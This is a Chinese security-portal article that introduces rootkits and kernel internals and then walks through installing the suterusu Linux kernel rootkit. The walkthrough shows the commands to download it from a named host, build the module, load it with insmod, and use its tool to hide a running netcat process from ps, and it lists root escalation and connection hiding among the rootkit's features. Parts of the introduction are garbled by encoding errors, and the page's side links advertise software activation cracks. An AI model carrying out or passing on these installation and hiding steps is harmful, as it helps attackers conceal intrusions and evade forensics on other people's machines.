资讯安全论坛下载读书程序开发数据库系统网络电子书微信学院站长学院 QQ 考试

频道栏目

系统安全| 网站安全| 企业安全| 网络安全| 工具软件| 杀毒防毒| 加密解密|

首页 > 安全 > 工具软件 > 正文

Linux Rootkit suterusu

2021-04-18 12:56:49 作者：Dis9Team

收藏我要投稿

前言

    最早Rootkit用于善意用途，但后来Rootkit也被骇客用在入侵和攻击他人的电脑系统上，电脑病毒、间谍软件等也常使用Rootkit来隐藏踪迹，因此Rootkit已被大多数的防毒软件归类为具�：π缘亩褚馊砑�。Linux、Windows、Mac OS等操作系统都有机会成为Rootkit的受害目标。
    Rootkit出现于二十世纪90年代初，在1994年2月的一篇安全咨询报告中首先使用了rootkit这个名词。这篇安全资讯就是CERT-CC的CA-1994-01，题目是Ongoing Network Monitoring Attacks，最新的修订时间是2021年04月18日。从出现至今，rootkit的技术发展非常迅速，应用越来越广泛，检测难度也越来越大。
    rootkit介绍Rootkit是一种奇特的程序，它具有隐身功能：无论静止时（作为文件存在），还是活动时，（作为进程存在），都不会被察觉�；痪浠八�，这种程序可能一直存在于我们的计算机中，但我们却浑然不知，这一功能正是许多人梦寐以求的——不论是计算机黑客，还是计算机取证人员�：诳涂梢栽谌肭趾笾萌隦ootkit，秘密地窥探敏感信息，或等待时机，伺机而动；取证人员也可以利用Rootkit实时监控嫌疑人员的不法行为，它不仅能搜集证据，还有利于及时采取行动。！
    从上文中我们已经了解，内核在系统中处于核心枢纽的地位，下面我们具体介绍内核中与Rootkit紧密相关的几个主要功能，更重要的是这些功能对Rootkit的意义所在：

    进程管理。进程可以简单理解为运行中的程序，它需要占用内存、CPU时间等系统资源。现在的操作系统大多支持多用户多任务，也就是说系统要并行运行多个程序。为此，内核不仅要有专门代码来负责为进程或线程分配CPU时间，另一方面还要开辟一段内存区域存放用来记录这些进程详细情况的数据结构。内核是怎么知道系统中有多少进程、各进程的状态等信息的？就是通过这些数据结构，换句话说它们就是内核感知进程存在的依据。因此，只要修改这些数据结构，就能达到隐藏进程的目的。
    文件访问。文件系统是操作系统提供的最为重要的功能之一。内核中的驱动程序把设备的柱面、扇区等原始结构抽象成为更加易用的文件系统，并提供一个一致的接口供上层程序调用。也就是说，这部分代码完全控制着对硬盘的访问，通过修改内核的这部分代码，攻击者能够隐藏文件和目录。
    安全控制。对大部分操作系统来说，因为系统中同时存在多个进程，为了避免各进程之间发生冲突，内核必须对各进程实施有效的隔离措施。比如，在MS-Windows系统中，每个进程都被强制规定了具体的权限和单独的内存范围。因此，对攻击者而言，只要对内核中负责安全事务的代码稍事修改，整个安全机制就会全线崩溃。

    内存管理。现在的硬件平台（比如英特尔的奔腾系列处理器）的内存管理机制已经复杂到可以将一个内存地址转换成多个物理地址的地步。举例来说，进程A按照地址 0x0030030读取内存，它得到值的是“飞机”；然而，进程B也是按照同样的地址0x0030030来读取内存，但它取得的值却是“大炮”。像上面这样，同一个地址指向截然不同的两个物理内存位置，并且每个位置存放不同的数据这种现象并不足以为怪——只不过是两个进程对虚拟地址到物理地址进行了不同的映射而已。如果这一点利用好了，我们可以让Rootkit躲避调试程序和取证软件的追踪。

suterusu

suterusu是一个功能很强大的Rootkit，能在android上使用哦支持UBUNTU 2.6 到3.5.。。。。通杀

安装

root@Dis9Team:/tmp# wget http://lucky.fuzzexp.org/file/r00tk1t/suterusu.tar.gz
root@Dis9Team:/tmp# tar xf suterusu.tar.gz 
root@Dis9Team:/tmp# cd suterusu/
root@Dis9Team:/tmp/suterusu# make linux-x86 KDIR=/lib/modules/$(uname -r)/build
make ARCH=x86 EXTRA_CFLAGS=-D_CONFIG_X86_ -C /lib/modules/2.6.38-8-generic/build M=/tmp/suterusu modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.38-8-generic'
  CC [M]  /tmp/suterusu/suterusu.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /tmp/suterusu/suterusu.mod.o
  LD [M]  /tmp/suterusu/suterusu.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic'
root@Dis9Team:/tmp/suterusu#

编辑TOOLS

root@Dis9Team:/tmp/suterusu# gcc sock.c -o sock

加载模块

root@Dis9Team:/tmp/suterusu# insmod suterusu.ko

功能

获得ROOT权限

隐藏进程

brk@Dis9Team:/tmp/suterusu$ nc -vv 127.0.0.1 22 &&
> ^C
brk@Dis9Team:/tmp/suterusu$ nc -vv 127.0.0.1 22 &
[1] 7343
brk@Dis9Team:/tmp/suterusu$ Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3

brk@Dis9Team:/tmp/suterusu$ ./sock 1 7343
Hiding PID 7343
brk@Dis9Team:/tmp/suterusu$ ps -ef | grep nc
root        10     2  0 08:42 ?        00:00:00 [sync_supers]
postgres  1628  1393  0 08:42 ?        00:00:00 postgres: autovacuum launcher process                                                                                       
root      2500  2444  0 08:42 ?        00:00:00 /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session gnome-session --session=ubuntu
root      2503     1  0 08:42 ?        00:00:00 /usr/bin/dbus-launch --exit-with-session gnome-session --session=ubuntu
root      2584  2565  0 08:42 ?        00:00:00 [zeitgeist-datah] 
root      2641     1  0 08:42 ?        00:00:00 /usr/lib/gnome-panel/wnck-applet
brk       7350  7245  0 09:26 pts/1    00:00:00 grep --color=auto nc

隐藏TCPv4

更多的功能

更多的功能看他的帮助文档

参考

http://www.qf0731.com/Article/201211/172078.html 一次ROOTKIT检测
http://www.qf0731.com/Article/201208/150267.html 端口复用：隐藏嗅探与攻击
http://fuzzexp.org/i-did-not-expect-in-rootkit-2.html 没想到中rootkit了
http://fuzzexp.org/the-linux-rootkit-door-realization.html Linux Rootkit Door的实现

点击复制链接与好友分享!回本站首页

相关TAG标签

上一篇：cheat engine 使用教程

下一篇：如何使用Nessus扫描漏洞

相关文章

热门专题推荐 md5 解密杀毒软件个人电脑安全脱壳破解 u盘启动工具小马激活工具 office激活 word win7激活工具

图文推荐

文章

推荐

· Fedora 25将支持MP3播放

· 只狼：影逝二度PC配置需求高吗只狼：

· 苹果官网上线“送礼”专区：提醒你买买

· 中兴通讯首席技术官

· 腾讯投资首秀成绩单

· 小米9评测之3000元档国产旗舰新标杆

· 微医确认推进分拆上市

· 最早提出“云计算”的谷歌

· win7激活工具

· win10激活工具

· win7激活工具旗舰版

· office2010激活密钥

· windows7激活密钥

· office2010激活工具

· 小马激活工具

· win10激活工具

热门新闻

· Burp Suite使用介绍（一）（二）

· charles使用教程指南

· 10大Web漏洞扫描器

· 利用WireShark进行DNS协议分析

· 对几款网络抓包工具的评测

· Burpsuite1.7.03网站渗透神器最新破解

· 2016年最佳的15款Android黑客工具

· 使用MSF入侵Windows

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 全峰安全联盟--致力于做实用的IT技术学习网站